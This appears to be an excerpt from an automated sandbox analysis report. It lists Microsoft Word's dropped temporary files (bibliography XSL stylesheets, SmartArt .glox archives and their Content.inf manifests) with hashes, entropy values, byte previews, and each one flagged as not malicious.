                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EDA.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):278
                                                                                                                                                        Entropy (8bit):3.5280239200222887
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EDA.tmp\gb.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):268317
                                                                                                                                                        Entropy (8bit):5.05419861997223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EDB.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):252
                                                                                                                                                        Entropy (8bit):3.48087342759872
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                        MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                        SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                        SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                        SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EDB.tmp\PictureFrame.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4326
                                                                                                                                                        Entropy (8bit):7.821066198539098
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEB.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):280
                                                                                                                                                        Entropy (8bit):3.484503080761839
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                        MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                        SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                        SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                        SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEB.tmp\InterconnectedBlockProcess.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9191
                                                                                                                                                        Entropy (8bit):7.93263830735235
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEC.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):260
                                                                                                                                                        Entropy (8bit):3.494357416502254
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                                        MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                                        SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                                        SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                                        SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEC.tmp\ThemePictureGrid.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6193
                                                                                                                                                        Entropy (8bit):7.855499268199703
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EED.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):238
                                                                                                                                                        Entropy (8bit):3.472155835869843
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                        MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                        SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                        SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                        SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EED.tmp\rings.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5151
                                                                                                                                                        Entropy (8bit):7.859615916913808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEE.tmp\CircleProcess.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16806
                                                                                                                                                        Entropy (8bit):7.9519793977093505
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EEE.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4720677950594836
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                        MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                        SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                        SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                        SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EFF.tmp\APASixthEditionOfficeOnline.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):333258
                                                                                                                                                        Entropy (8bit):4.654450340871081
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EFF.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):328
                                                                                                                                                        Entropy (8bit):3.541819892045459
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                                        SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                                        SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                                        SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F10.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):290
                                                                                                                                                        Entropy (8bit):3.5161159456784024
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                        Malicious:false
